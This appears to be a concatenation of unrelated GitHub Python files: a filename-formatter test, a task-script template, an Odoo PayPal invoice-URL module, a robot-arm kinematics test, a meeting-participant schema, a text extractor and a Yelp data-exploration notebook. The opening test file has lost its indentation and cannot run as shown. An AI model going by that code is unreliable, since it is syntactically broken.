self.assertIsNone(formatter.clean_series_name(None))
self.assertEqual(formatter.clean_series_name(''), '')
name = 'an.example.1.0.test'
self.assertEqual(formatter.clean_series_name(name),
'an example 1.0 test')
name = 'an_example_1.0_test'
self.assertEqual(formatter.clean_series_name(name),
'an example 1.0 test')
def test_apply_replacements(self):
self.assertEqual('sample.avi',
formatter.apply_replacements('sample.avi', None))
self.assertEqual('sample.avi',
formatter.apply_replacements('sample.avi', []))
reps = [{'match': '_test',
'replacement': '',
'with_extension': False,
'is_regex': False},
]
self.assertEqual('sample.avi',
formatter.apply_replacements('sample_test.avi', reps))
reps = [{'match': '_test',
'replacement': '',
'with_extension': True,
'is_regex': False},
]
self.assertEqual('sample.avi',
formatter.apply_replacements('sample_test.avi', reps))
reps = [{'match': '[ua]+',
'replacement': 'x',
'with_extension': False,
'is_regex': True},
]
self.assertEqual('sxmple_test.avi',
formatter.apply_replacements('sample_test.avi', reps))
def test_format_episode_numbers(self):
epnums = [1]
self.assertEqual(formatter._format_episode_numbers(epnums),
'01')
epnums = [1, 2, 3, 4, 5]
self.assertEqual(formatter._format_episode_numbers(epnums),
'01-02-03-04-05')
def test_format_episode_name(self):
names = ['Pilot']
self.assertEqual(formatter._format_episode_name(names),
'Pilot')
names = ['Pilot (1)', 'Pilot (2)']
self.assertEqual(formatter._format_episode_name(names),
'Pilot (1-2)')
names = ['From Hell', 'And Back']
self.assertEqual(formatter._format_episode_name(names),
'From Hell, And Back')
def test_make_valid_filename(self):
# normal - asis
name = 'person.of.interest.s04e10.proper.hdtv.x264-w4f.mp4'
self.assertEqual(formatter._make_valid_filename(name),
'person.of.interest.s04e10.proper.hdtv.x264-w4f.mp4')
name = '.sample.filename'
self.assertEqual(formatter._make_valid_filename(name),
'_.sample.filename')
name = six.u('foo\xf1bar')
self.assertEqual(formatter._make_valid_filename(name),
'foobar')
with mock.patch.object(formatter.platform, 'system',
return_value='FreeBSD'):
# / (all OS)
name = 'person.of.interest.s04/e10.x264/-w4f.mp4'
self.assertEqual(formatter._make_valid_filename(name),
'person.of.interest.s04_e10.x264_-w4f.mp4')
with mock.patch.object(formatter.platform, 'system',
return_value='Linux'):
# / (all OS)
name = 'person.of.interest.s04/e10.x264/-w4f.mp4'
self.assertEqual(formatter._make_valid_filename(name),
'person.of.interest.s04_e10.x264_-w4f.mp4')
with mock.patch.object(formatter.platform, 'system',
return_value='Darwin'):
# / (all OS)
name = 'person.of.interest.s04/e10.x264/-w4f.mp4'
self.assertEqual(formatter._make_valid_filename(name),
'person.of.interest.s04_e10.x264_-w4f.mp4')
# :
name = 'person.of.interest:.s04e10:.x264-w4f.mp4'
self.assertEqual(formatter._make_valid_filename(name),
'person.of.interest_.s04e10_.x264-w4f.mp4')
with mock.patch.object(formatter.platform, 'system',
return_value='Java'):
# / (all OS)
name = 'person.of.interest.s04/e10.x264/-w4f.mp4'
self.assertEqual(formatter._make_valid_filename(name),
'person.of.interest.s04_e10.x264_-w4f.mp4')
# :
name = 'person.of.interest:.s04e10:.x264-w4f.mp4'
self.assertEqual(formatter._make_valid_filename(name),
'person.of.interest_.s04e10_.x264-w4f.mp4')
# *
name = 'person.of.interest*.s04e10*.x264-w4f.mp4'
self.assertEqual(formatter._make_valid_filename(name),
'person.of.interest_.s04e10_.x264-w4f.mp4')
# ?
name = 'person.of.interest?.s04e10?.x264-w4f.mp4'
self.assertEqual(formatter._make_valid_filename(name),
'person.of.interest_.s04e10_.x264-w4f.mp4')
# "
name = 'person.of.interest".s04e10".x264-w4f.mp4'
self.assertEqual(formatter._make_valid_filename(name),
'person.of.interest_.s04e10_.x264-w4f.mp4')
# <
name = 'person.of.interest<.s04e10<.x264-w4f.mp4'
self.assertEqual(formatter._make_valid_filename(name),
'person.of.interest_.s04e10_.x264-w4f.mp4')
# >
name = 'person.of.interest>.s04e10>.x264-w4f.mp4'
self.assertEqual(formatter._make_valid_filename(name),
'person.of.interest_.s04e10_.x264-w4f.mp4')
# |
name = 'person.of.interest|.s04e10|.x264-w4f.mp4'
self.assertEqual(formatter._make_valid_filename(name),
'person.of.interest_.s04e10_.x264-w4f.mp4')
# major naming issues
name = '\\/:*?<Evil>|\"'
self.assertEqual(formatter._make_valid_filename(name),
'______Evil___')
name = 'CON.avi'
self.assertEqual(formatter._make_valid_filename(name),
'_CON.avi')
name = 'MJR1uc9JlkfFrnBjFlUQCpICUc6wl93wie4PmbjYbwj7j4j9MMrsWNG0yOJiheAwZkpRMgP1KBICoFN3ZztkciqZlmaXUeToJuh6hT9cTHXqoghCbRVUNxP6JzIqrXB.OHcpQb0vojDr5fIMPu3Fgjzh9kaG3WYE9zHUmC8co2FjNBUiBIKHAMB73HBXpF4Y54eCg0CXTB29hhkDwbRsvWYn0i9tPE6kTsgVyQNb36S71aDqvuMmZp0ll3YIsrZXX' # noqa
self.assertEqual(formatter._make_valid_filename(name),
'MJR1uc9JlkfFrnBjFlUQCpICUc6wl93wie4PmbjYbwj7j4j9MMrsWNG0yOJiheAwZkpRMgP1KBICoFN3ZztkciqZlmaXUeToJuh6hT9cTHXqoghCbRVUNxP6JzIqrXB.OHcpQb0vojDr5fIMPu3Fgjzh9kaG3WYE9zHUmC8co2FjNBUiBIKHAMB73HBXpF4Y54eCg0CXTB29hhkDwbRsvWYn0i9tPE6kTsgVyQNb36S71aDqvuMmZp0ll3YIsr') # noqa
name = 'ykgoibnaioyabclikamnxbikiaujdjkvlhywrnhtyzbylugtcaxomlrbtpnqgvscrhqvkydnohwvhiusnkrjyrueqnjcpvwzuhpitmrtwwzmptkaxzgwzzjdgwlwswozniwilazcbrokqnlqdjnwoykuiejjvizpoiitcoiqvzuvcuwmcfsw.jfvxeujzshxjhcllrsemormrfknzfsoczbuisqmexamsrzifuoxjxysicikfgegjwkojyrokijxyefekyilqsnwaqkgiyuayasac' # noqa
self.assertEqual(formatter._make_valid_filename(name),
'ykgoibnaioyabclikamnxbikiaujdjkvlhywrnhtyzbylugtcaxomlrbtpnqgvscrhqvkydnohwvhiusnkrjyrueqnjcpvwzuhpitmrtwwzmptkaxzgwzzjdgwlwswozniwilazcbrokqnlqdjnwoykui.jfvxeujzshxjhcllrsemormrfknzfsoczbuisqmexamsrzifuoxjxysicikfgegjwkojyrokijxyefekyilqsnwaqkgiyuayasac') # noqa
def test_format_filename(self):
self.CONF.set_override(
'filename_format_ep',
'S%(seasonnumber)02dE%(episode)s-%(episodename)s%(ext)s')
self.CONF.set_override('output_filename_replacements',
[])
self.assertEqual(formatter.format_filename(None, 2, [2],
['The Codpiece Topology'],
'.avi'),
'S02E02-The Codpiece Topology.avi')
self.CONF.set_override(
'filename_format_ep',
'%(seriesname)s - S%(seasonnumber)02dE%(episode)s-%(episodename)s%(ext)s') # noqa
self.assertEqual(formatter.format_filename('the big bang theory',
2, [2],
['The Codpiece Topology'],
'.avi'),
'The Big Bang Theory - S02E02-The Codpiece Topology.avi') # noqa
self.CONF.set_override(
'filename_format_ep',
'%(seriesname)s - S%(seasonnumber)02dE%(episode)s-%(episodename)s%(ext)s') # noqa
self.CONF.set_override('output_filename_replacements',
[{'match': 'Heartland (2007) (CA)',
'replacement': 'Heartland (CA)'}])
self.assertEqual(formatter.format_filename('Heartland (2007) (CA)',
2, [2],
['Letting Go'],
'.mp4'),
'Heartland (CA) - S02E02-Letting Go.mp4')
def test_format_dirname(self):
self.CONF.set_override(
'directory_name_format',
'%(seriesname)s/Season %(seasonnumber)02d')
self.assertEqual(formatter.format_dirname('Sample Series', 2),
'Sample Series/Season 02')
@mock.patch('os.path.isdir')
def test_find_library(self, mock_isdir):
series_path = 'The Big Bang Theory/Season 01'
locations = ['\\NAS/Share/Video/Current',
'\\NAS/Share/Video/Offair',
'/local/video']
default_location = '\\NAS/Share/Video/TBD'
self.CONF.set_override('libraries', locations)
self.CONF.set_override('default_library', default_location)
mock_isdir.return_value = True
result = formatter.find_library(series_path)
self.assertEqual(result, '\\NAS/Share/Video/Current')
mock_isdir.return_value = False
result = formatter.find_library(series_path)
self.assertEqual(result, default_location)
mock_isdir.side_effect = (False, False, False, False, False, True)
result = formatter.find_library(series_path)
self.assertEqual(result, '/local/video')
| shad7/tvrenamer | tvrenamer/tests/core/test_formatter.py | test_formatter.py | py | 11,698 | python | en | code | 0 | github-code | 50 |
32677128650 | #!/usr/bin/python3
# -*- coding: utf-8 -*-
# -------------------------------------------
# Name: YOUR NAME
# Version: 0.1
# Notes: ADD UPDATES HERE
# -------------------------------------------
# Imports
import sys, logging
# Path to DBConnect
sys.path.append("../")
# Import DBConnect
import DBConnect
# Path to /opt/boru/plugins
sys.path.append("../boru/plugins")
# Import all plugins.
# You may be required to process plugins to start/finish/suspend/resume a lab.
from plugins import *
# ------------------------------
# main - Called by the scheduler
# ------------------------------
# jsonDoc - Everything passed in from the 'generateStartLabTaskBuffer'(or Finish or Suspend or Resume) function in the scheduler.
def main(jsonDoc):
# ------------
# Logger setup
# ------------
try:
logging.basicConfig(filename='/var/log/boru.log',level=logging.INFO, format="%(asctime)s: %(levelname)s: %(message)s")
log = logging.getLogger('SCRIPT_NAME')
except Exception as e:
# No logging, just print, can't log :(
print("[SCRIPT_NAME] Critical Logger Setup Error: {}".format(str(e)))
# Exit
return
# -----------------------------------
# Extracting the task_id from jsonDoc
# -----------------------------------
# Required to use DBConnect, passed into every jsonDoc.
taskId = jsonDoc['task_id']
# --------------
# YOUR CODE HERE
# --------------
# --------------------------------------------------------------------------------------------------------------------
# EXAMPLES BELOW
# --------------------------------------------------------------------------------------------------------------------
# ----------------------------------------------------------
# Example of appending 'ERROR' information using 'DBConnect'
# ----------------------------------------------------------
# NOTE: This script MUST update the Task Status to 'Error' or 'Ready' before exiting any script.
try:
i = 10 / 0
except Exception as e:
# Logging
errorExceptionInfo = "[SCRIPT_NAME] Example Function Error: {}".format(str(e))
log.exception(errorExceptionInfo)
# Update task['errorInfo']
DBConnect.appendTaskErrorInfo(taskId, accountName, "Error: {}".format(str(e)))
# Update task['taskStatus'] to 'Error'
DBConnect.setTaskStatusToError(taskId)
# Exit
return
# ------------------------------------------------------------
# Example of appending 'SUCCESS' information using 'DBConnect'
# ------------------------------------------------------------
# NOTE: This script MUST update the Task Status to 'Ready' or 'Error' before exiting any script.
# Update task['successInfo']
DBConnect.appendTaskSuccessInfo(taskId, accountName, "Successful Info Here")
# Update task['taskStatus'] to 'Ready'
DBConnect.setTaskStatusToReady(taskId)
# Exit
return
# -------------------------------------------------------------------------------------------------------------------- | JarekCode/Boru | scripts/scriptTemplate.py | scriptTemplate.py | py | 3,064 | python | en | code | 0 | github-code | 50 |
32538776490 | # -*- coding: utf-8 -*-
# © 2015 Elico corp (www.elico-corp.com)
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl.html).
from urllib import urlencode
from openerp.osv import fields, osv
class AccountAccount(osv.osv):
_inherit = 'account.invoice'
def _edi_paypal_url(self, cr, uid, ids, field, arg, context=None):
res = dict.fromkeys(ids, False)
for inv in self.browse(cr, uid, ids, context=context):
if inv.type == 'out_invoice' and inv.company_id.paypal_account:
item_name = "%s Invoice %s" % (
inv.company_id.name, inv.number or '')
item_name = item_name.encode('utf-8')
params = {
"cmd": "_xclick",
"business": inv.company_id.paypal_account,
"item_name": item_name,
"invoice": inv.number,
"amount": inv.residual,
"currency_code": inv.currency_id.name,
"button_subtype": "services",
"no_note": "1",
"bn": "OpenERP_Invoice_PayNow_" + inv.currency_id.name,
}
res[inv.id] = "https://www.paypal.com/cgi-bin/webscr?"\
+ urlencode(params)
return res
_columns = {
'paypal_url': fields.function(
_edi_paypal_url, type='char', string='Paypal Url'),
}
AccountAccount()
| Elico-Corp/odoo-addons | payment_utf8/invoice.py | invoice.py | py | 1,457 | python | en | code | 45 | github-code | 50 |
21119618969 | """
Plots figure 2A, boxplot of reported times.
"""
import pickle
import os
import numpy as np
from matplotlib import pyplot as plt
import importlib.util
from fna.tools.visualization.helper import set_global_rcParams
from fna.tools.utils import logger
from fna.tools.utils.data_handling import set_storage_locations
from helper import plotting
from helper import fig_defaults as fig_def
from utils.parameters import ParameterSet
logprint = logger.get_logger(__name__)
def plot_multi_batch(parameters, storage_paths, ax, plot_traces=True):
"""
"""
filename = 'Recordings_{}.data'.format(parameters.label)
try:
with open(os.path.join(storage_paths['activity'], filename), 'rb') as f:
data = pickle.load(f)
reward_times = data['reward_times']
recorded_data = data['recorded_data']
except Exception as e:
logprint.error(f'Exception occured: {str(e)}.\n\tSkipping dataset {parameters.label}')
return
colors = plotting.sns.color_palette('tab10')[:6]
plotting.boxplot_multitrial(parameters, recorded_data, reward_times, ax, plot_rewards=False, colors=colors)
test_batches = len(recorded_data['test_epoch'].keys())
ax.set_title(f"Reported times, {test_batches} trials,\none learning instance")
def plot_multi_instance(parameters, storage_paths, ax, plot_traces=True):
main_param_file = os.path.join(storage_paths['main'], 'ParameterSpace.py')
spec = importlib.util.spec_from_file_location("ParameterSpace", main_param_file)
mod_param = importlib.util.module_from_spec(spec)
spec.loader.exec_module(mod_param)
trials = mod_param.ParameterRange['T']
recorded_data = []
for trial in trials:
inst_label = parameters.label[:parameters.label.find('_T=')] + f'_T={trial}'
filename = 'Recordings_{}.data'.format(inst_label)
try:
with open(os.path.join(storage_paths['activity'], filename), 'rb') as f:
data = pickle.load(f)
recorded_data.append(data['recorded_data'])
except Exception as e:
logprint.error(f'Exception occured: {str(e)}.\n\tSkipping dataset {filename}')
continue
plotting.boxplot_multi_instance(parameters, recorded_data, ax)
def run(parameters, display=False, plot=True, save=True, load_inputs=False):
# experiments parameters
if not isinstance(parameters, ParameterSet):
parameters = ParameterSet(parameters)
storage_paths = set_storage_locations(parameters.kernel_pars.data_path, parameters.kernel_pars.data_prefix,
parameters.label, save=save)
logger.update_log_handles(job_name=parameters.label, path=storage_paths['logs'])
fig, axes = plt.subplots(nrows=1, ncols=2, figsize=fig_def.figsize['re_fig3s2_boxplot'], sharex=True)
plot_multi_batch(parameters, storage_paths, axes[0])
plot_multi_instance(parameters, storage_paths, axes[1])
n_cols = parameters.net_pars.n_cols
token_durations = np.array([sum(parameters.input_pars.misc.token_duration[0:i+1]) for i in range(n_cols)])
ylim_max = max(axes[0].get_ylim()[1], axes[1].get_ylim()[1])
for _ax in axes:
_ax.grid(False)
_ax.set_title(None)
_ax.set_ylabel(None)
_ax.set_ylim(0., ylim_max + 200)
_ax.set_yticks(token_durations)
# _ax.set_yticks([700., 1400., 2100., 2800.])
_ax.set_xticklabels(list(range(n_cols)))
_ax.set_xlabel('Column')
_ax.yaxis.set_tick_params(labelbottom=True)
axes[0].set_title('Recall times, \none instance')
axes[1].set_title('Median recall times,\n10 instances')
axes[0].set_ylabel('Time (s)')
# axes[0].set_yticklabels([0.7, 1.4, 2.1, 2.8])
axes[0].set_yticklabels(np.around(token_durations / 1000., decimals=1))
axes[1].set_yticklabels([])
fig.tight_layout()
fig.savefig(os.path.join(storage_paths['figures'], 'Fig_2A_boxplot{}.pdf'.format(parameters.label)))
fig.savefig(os.path.join(storage_paths['figures'], 'Fig_2A_boxplot{}.svg'.format(parameters.label)))
| zbarni/re_modular_seqlearn | src/cone_shouval_2021/experiments/plot_fig2_a.py | plot_fig2_a.py | py | 4,089 | python | en | code | 1 | github-code | 50 |
1150928520 | from profile.profile import Profile
from paths.circle import Circle
import kinematics
import numpy as np
###################################################
# Tests a circular path in the profiler.
# Generates the profile, transforms it into
# configuration space, then tests each of the
# configuration space points against the
# original profile.
###################################################
def close(v1, v2, tol=0.0001):
return abs(np.linalg.norm(v1-v2)) < tol
q0 = np.array([0, 3.14 / 3])
l1 = 1
l2 = 2
x0 = kinematics.forward_state(q0[0], q0[1], l1, l2)
r = 0.75
c = Circle(x0[0] - r, x0[1], r, 1)
path = lambda t: c.getPathParams(t)[0:2]
dpath = lambda t: c.getPathParams(t)[2:4]
d2path = lambda t: c.getPathParams(t)[4:6]
p_original = Profile(path, dpath, d2path, 3)
p_transformed = Profile(path, dpath, d2path, 3)
qfn = lambda x: kinematics.forward_state(x[0], x[1], l1, l2)
jfn = lambda x: kinematics.forward_jacobian(x[0], x[1], l1, l2)
hfn = lambda x: kinematics.forward_hessian(x[0], x[1], l1, l2)
p_transformed.transform(q0, qfn, jfn, hfn)
i = 0
with open("log.csv", "w+") as f:
f.write(", ".join(["x_tf", "y_tf", "x_or", "y_or"]) + '\n')
for p1, p2 in zip(p_original.path, p_transformed.path):
q_tf = kinematics.forward_state(p2.q[0], p2.q[1], l1, l2)
q_or = np.array([p1.q[0], p1.q[1]])
f.write(", ".join(map(str, np.concatenate([q_tf, q_or]))) + '\n')
if not close(q_tf, q_or):
print("Within tolerance for " + str(i) + " time steps")
# print(p1)
# print(p2)
# print(str(q_tf) + " != " + str(q_or))
break
else:
i += 1
else:
print("Within tolerance for entire time") | lessthantrue/RobotProjects | double_joint_arm/profile_test.py | profile_test.py | py | 1,738 | python | en | code | 3 | github-code | 50 |
20068340110 | from operator import itemgetter
import os
import json
import re
import flatland as fl
from flatland.validation import IsEmail, Converted, Validator
import database
def _load_json(name):
with open(os.path.join(os.path.dirname(__file__), name), "rb") as f:
return json.load(f)
class EnumValue(Validator):
fail = fl.validation.base.N_(u'%(u)s is not a valid value for %(label)s.')
def validate(self, element, state):
if element.valid_values:
if element.value not in element.valid_values:
return self.note_error(element, state, 'fail')
return True
class IsPhone(Validator):
fail = fl.validation.base.N_(
u"%(label)s is not valid. "
"Please enter three groups of digits separated by spaces.")
phone_pattern = re.compile(r'^\d+ \d+ \d+$')
def validate(self, element, state):
if self.phone_pattern.match(element.value) is None:
return self.note_error(element, state, 'fail')
return True
country = {item["id"]: item["name"] for item in
_load_json("refdata/countries.json")}
# sort by country name for select option
# [("iso code", "country_name"),]
sorted_country_codes = sorted(country.items(), key=itemgetter(1))
# ["iso_code", "iso_code"]
sorted_country_codes = [c[0] for c in sorted_country_codes]
personal_title = _load_json("refdata/titles.json")
language = _load_json("refdata/languages.json")
secretariat = _load_json("refdata/secretariat.json")
category = {c["id"]: c for c in _load_json("refdata/categories.json")}
category_labels = {c["id"]: c["name"] for c in category.values()}
region = {item["id"]: item["name"]
for item in _load_json("refdata/regions.json")}
# sort by region name for select option
sorted_regions = sorted(region.items(), key=itemgetter(1))
sorted_regions = [r[0] for r in sorted_regions]
fee = {item["id"]: item["name"] for item in
_load_json("refdata/fee.json")}
CommonString = fl.String.using(optional=True)
CommonEnum = fl.Enum.using(optional=True) \
.including_validators(EnumValue()) \
.with_properties(widget="select")
# CommonBoolean has optional=False because booleans are
# required to be True or False (None is not allowed)
CommonBoolean = fl.Boolean.using(optional=True).with_properties(widget="checkbox")
CommonDict = fl.Dict.with_properties(widget="group")
_PersonSchemaDefinition = fl.Dict.with_properties(widget="schema") \
.of(
CommonDict.named("personal") \
.using(label="") \
.of(
CommonEnum.named("name_title") \
.valued(*sorted(personal_title.keys())) \
.using(label=u"Personal title") \
.with_properties(attr={"autofocus": ""}),
CommonString.named("first_name") \
.using(optional=False,
label=u"First name"),
CommonString.named("last_name") \
.using(optional=False,
label=u"Last name"),
CommonEnum.named("language") \
.valued(*sorted(language.keys())) \
.using(label=u"Language") \
.with_properties(value_labels=language),
CommonString.named("address") \
.using(label=u"Address") \
.with_properties(widget="textarea"),
CommonString.named("email") \
.using(label=u"Email") \
.including_validators(IsEmail()) \
.with_properties(attr={"type": "email"}),
CommonString.named("phone") \
.using(label=u"Phone") \
.with_properties(attr={
"type": "tel",
"pattern": r"^\d+ \d+ \d+$",
"title": "(999 000 555)",
}),
CommonString.named("cellular") \
.using(label=u"Cellular"),
CommonString.named("fax") \
.using(label=u"Fax"),
CommonString.named("place") \
.using(label=u"Place"),
CommonEnum.named("country") \
.valued(*sorted_country_codes) \
.using(label=u"Country") \
.with_properties(value_labels=country),
CommonEnum.named("category") \
.valued(*sorted(category.keys())) \
.using(label=u"Category") \
.with_properties(value_labels=category_labels),
CommonEnum.named("fee") \
.using(label=u"Fee") \
.valued(*sorted(fee.keys())) \
.with_properties(value_labels=fee)
),
CommonDict.named("representing") \
.using(label=u"Representing") \
.of(
CommonEnum.named("country") \
.valued(*sorted_country_codes) \
.using(label=u"Country") \
.with_properties(value_labels=country),
CommonEnum.named("region") \
.valued(*sorted_regions) \
.using(label=u"Region") \
.with_properties(value_labels=region),
CommonString.named("organization") \
.using(label=u"Organization") \
.with_properties(widget="textarea"),
CommonBoolean.named("organization_show") \
.using(label=u"Show in address"),
),
CommonDict.named("meeting_flags") \
.using(label=u"Meeting flags") \
.of(
CommonBoolean.named("sponsored") \
.using(label=u"Sponsored"),
CommonBoolean.named("finance_subcommittee") \
.using(label=u"Finance Subcommittee"),
CommonBoolean.named("credentials") \
.using(label=u"Credentials"),
CommonBoolean.named("approval") \
.using(label=u"Approval"),
CommonBoolean.named("invitation") \
.using(label=u"Invitation"),
CommonBoolean.named("web_alert") \
.using(label=u"Web alert"),
CommonBoolean.named("verified") \
.using(label=u"Verified"),
fl.Date.named("acknowledged") \
.using(label=u"Date acknowledged",
optional=True) \
.including_validators(Converted(incorrect=u"%(label)s is not "
"a valid date")),
CommonBoolean.named("attended") \
.using(label=u"Attended"),
),
CommonDict.named("more_info") \
.using(label=u"Additional information") \
.of(
CommonString.named("text") \
.using(label=u"") \
.with_properties(widget="textarea"),
),
)
class PersonSchema(_PersonSchemaDefinition):
@property
def value(self):
return Person(super(PersonSchema, self).value)
class Person(dict):
id = None
@staticmethod
def from_flat(person_row):
person = PersonSchema.from_flat(person_row).value
person.id = person_row.id
return person
@classmethod
def get_or_404(cls, person_id):
return cls.from_flat(database.get_person_or_404(person_id))
@property
def name(self):
return "%s %s %s" % (
self["personal"]["name_title"],
self["personal"]["first_name"],
self["personal"]["last_name"],
)
@property
def has_photo(self):
assert self.id is not None
person_row = database.get_person_or_404(self.id)
return bool(person_row.get("photo_id", ""))
def representing(self, description=None):
category_id = self["personal"]["category"]
representing = ""
if category_id == "10":
representing = "%s - %s" % (
region[self["representing"]["region"]],
country[self["representing"]["country"]],
)
elif category_id in ["20", "30", "40"]:
representing = country[self["representing"]["country"]]
elif category_id in ["98", "99"]:
representing = description or category[category_id]["name"]
else:
representing = self["representing"]["organization"]
return representing
@property
def category(self):
return category.get(self["personal"]["category"], "")
@property
def region(self):
return region.get(self["representing"]["region"], "")
@property
def country(self):
return country.get(self["representing"]["country"], "")
@property
def personal_country(self):
return country.get(self["personal"]["country"], "")
@property
def fee(self):
return fee.get(self["personal"]["fee"], "")
@property
def language(self):
return language.get(self["personal"]["language"], "")
@property
def room_list(self):
category_id = self["personal"]["category"]
room_list = None
if category_id == "10":
room_list = "%s - %s" % (
region[self["representing"]["region"]],
country[self["representing"]["country"]],
)
elif category_id in ("20", "30", "40"):
room_list = country[self["representing"]["country"]]
elif category_id > 40:
room_list = self["representing"]["organization"]
return room_list
@property
def ref_list(self):
category_id = self["personal"]["category"]
ref_list = None
if category_id == "10":
ref_list = "%s-%s" % (
region[self["representing"]["region"]],
country[self["representing"]["country"]],
)
elif category_id in ("20", "30", "40"):
ref_list = country[self["representing"]["country"]]
elif category_id in ("98", "99"):
ref_list = self["representing"]["organization"]
return ref_list
@property
def verifpart(self):
category_id = self["personal"]["category"]
verifpart = None
if category_id in ["10", "20", "30", "40"]:
verifpart = country[self["representing"]["country"]]
else:
verifpart = self["representing"]["organization"]
return verifpart
MailSchema = fl.Dict.with_properties(widget="mail") \
.of(
CommonString.named("to") \
.using(label=u"To", optional=False) \
.including_validators(IsEmail()) \
.with_properties(widget="input"),
CommonString.named("cc") \
.using(label=u"Cc") \
.including_validators(IsEmail())
.with_properties(widget="input"),
CommonString.named("subject") \
.using(label=u"Subject", optional=False) \
.with_properties(widget="input"),
CommonString.named("message") \
.using(label=u"Message",
optional=False,
strip=False) \
.with_properties(widget="textarea")
)
from flatland.signals import validator_validated
from flatland.schema.base import NotEmpty
@validator_validated.connect
def validated(sender, element, result, **kwargs):
if sender is NotEmpty:
if not result:
label = getattr(element, 'label', element.name)
element.add_error(u"%s is required" % label)
| dincamihai/cites-meetings | cites/schema.py | schema.py | py | 11,640 | python | en | code | 1 | github-code | 50 |
10838901651 | import os
import sys
def extract_txt(folder):
folder_list = [os.path.join(folder, file) for file in os.listdir(folder)]
for folder in folder_list:
if len(folder.split('.')) == 1:
file_list = [file for file in os.listdir(folder) if file.split('.')[1]=='txt']
with open(folder + '.csv', 'w') as f:
# skip 00000000.txt
if file_list[0]=='00000000.txt':
file_list.pop(0)
row = 1
else:
row = 0
for file in file_list:
frame = int(file.split('.')[0])
if frame != row:
f.write('\n' * (frame - row))
row = frame
with open(os.path.join(folder,file), 'r') as text:
content = text.readlines()
f.write(','.join(content))
row += 1
print('Extracted: ', folder)
else:
print('Skipped: ', folder)
if __name__=='__main__':
if len(sys.argv) > 1:
folder = sys.argv[1]
extract_txt(folder)
| realtimshady1/Koalafinder | utils/extract_txt.py | extract_txt.py | py | 1,159 | python | en | code | 1 | github-code | 50 |
30211999203 |
# coding: utf-8
# In[56]:
# package imports
#basics
import numpy as np
import pandas as pd
import ast
#misc
import gc
import time
import warnings
#viz
import matplotlib.pyplot as plt
import seaborn as sns
import matplotlib.gridspec as gridspec
import matplotlib.gridspec as gridspec
#settings
start_time=time.time()
color = sns.color_palette()
sns.set_style("dark")
import re
import warnings
warnings.filterwarnings("ignore")
from sklearn.linear_model import ElasticNet, Lasso, BayesianRidge, LassoLarsIC
from sklearn.ensemble import RandomForestRegressor, GradientBoostingRegressor
from sklearn.pipeline import make_pipeline
from sklearn.preprocessing import RobustScaler
from sklearn.base import BaseEstimator, TransformerMixin, RegressorMixin, clone
from sklearn.model_selection import KFold, cross_val_score, train_test_split
from sklearn.metrics import mean_squared_error
import xgboost as xgb
from xgboost.sklearn import XGBRegressor
from sklearn.grid_search import GridSearchCV
from matplotlib.pylab import rcParams
rcParams['figure.figsize'] = 12, 4
from sklearn.metrics import mean_absolute_error
from sklearn.metrics import fbeta_score, make_scorer
from sklearn.metrics import mean_squared_error
from math import sqrt
get_ipython().run_line_magic('matplotlib', 'inline')
# In[2]:
#importing business dataset
business=pd.read_csv("yelp_academic_dataset_business.csv")
end_time=time.time()
print("Took",end_time-start_time,"s")
# In[3]:
#take a peak
business.head()
# In[4]:
business.info()
# In[5]:
#Get the distribution of the ratings
x=business['stars'].value_counts()
x=x.sort_index()
#plot
plt.figure(figsize=(8,4))
ax= sns.barplot(x.index, x.values, alpha=0.8)
plt.title("Star Rating Distribution")
plt.ylabel('# of businesses', fontsize=12)
plt.xlabel('Star Ratings ', fontsize=12)
#adding the text labels
rects = ax.patches
labels = x.values
for rect, label in zip(rects, labels):
height = rect.get_height()
ax.text(rect.get_x() + rect.get_width()/2, height + 5, label, ha='center', va='bottom')
plt.show()
# In[6]:
#Get the distribution of the citys
x=business['city'].value_counts()
x=x.sort_values(ascending=False)
x=x.iloc[0:20]
plt.figure(figsize=(16,4))
ax = sns.barplot(x.index, x.values, alpha=0.8,color=color[3])
plt.title("Which city has the most reviews?")
locs, labels = plt.xticks()
plt.setp(labels, rotation=45)
plt.ylabel('# businesses', fontsize=12)
plt.xlabel('City', fontsize=12)
#adding the text labels
rects = ax.patches
labels = x.values
for rect, label in zip(rects, labels):
height = rect.get_height()
ax.text(rect.get_x() + rect.get_width()/2, height + 5, label, ha='center', va='bottom')
plt.show()
# In[7]:
type(business['categories'])
# In[8]:
print(business['categories'].head())
# In[9]:
# What are the popular business categories?
strinfo = re.compile(' ')
business_cat= business['categories'].str.cat(sep = ',')
business_cats = strinfo.sub('', business_cat)
#print(business_cats)
cats=pd.DataFrame(business_cats.split(','),columns=['category'])
print(cats.head())
x=cats.category.value_counts()
print(x.head(20))
print("There are ",len(x)," different types/categories of Businesses in Yelp!")
#prep for chart
x=x.sort_values(ascending=False)
x=x.iloc[0:20]
# In[10]:
#chart
plt.figure(figsize=(16,4))
ax = sns.barplot(x.index, x.values, alpha=0.8)#,color=color[5])
plt.title("What are the top categories?",fontsize=25)
locs, labels = plt.xticks()
plt.setp(labels, rotation=80)
plt.ylabel('# businesses', fontsize=12)
plt.xlabel('Category', fontsize=12)
#adding the text labels
rects = ax.patches
labels = x.values
for rect, label in zip(rects, labels):
height = rect.get_height()
ax.text(rect.get_x() + rect.get_width()/2, height + 5, label, ha='center', va='bottom')
plt.show()
# In[11]:
business_NLasVeg = business[business['city']=='North Las Vegas']
print(business_NLasVeg.head())
print(business_NLasVeg.info())
# In[12]:
x=business['city'].value_counts()
print(x.head(20))
# In[13]:
#change all the nan value into 0
business_NLasVeg = business_NLasVeg.fillna(0).apply(pd.to_numeric, errors = 'ignore')
print(business_NLasVeg.head())
print(business_NLasVeg['attributes.Ambience'].head())
# In[14]:
# check that all nulls are removed
business_NLasVeg.isnull().sum().sum()
# In[15]:
sns.boxplot(x='attributes.WiFi', y='stars', data=business_NLasVeg);
# In[16]:
print(business_NLasVeg['categories'].head())
# In[17]:
business_NLasVeg.columns
# In[18]:
business_NLasVeg["attributes.RestaurantsAttire"].head(10)
#type(business_NLasVeg["review_count"])
# In[19]:
#split categories columns into sub category column
business_NLasVeg['categories_clean'] = list(map(lambda x: ''.join(x.split()),business_NLasVeg['categories'].astype(str)))
#print(business_NLasVeg['categories_clean'])
categories_df = business_NLasVeg.categories_clean.str.get_dummies(sep=',')
business_NLasVeg = business_NLasVeg.merge(categories_df, left_index=True, right_index=True)
print(business_NLasVeg.info())
#print(business_NLasVeg.head())
print(categories_df.columns)
# In[20]:
select_df = business_NLasVeg[business_NLasVeg['Restaurants'] == 1]
print(categories_df['Restaurants'].value_counts())
#print(select_df.head())
select_df = select_df.drop(columns = ['attributes'])
select_df.iloc[:, 40:60].head(20)
#print(select_df.info())
# In[21]:
print(select_df.info())
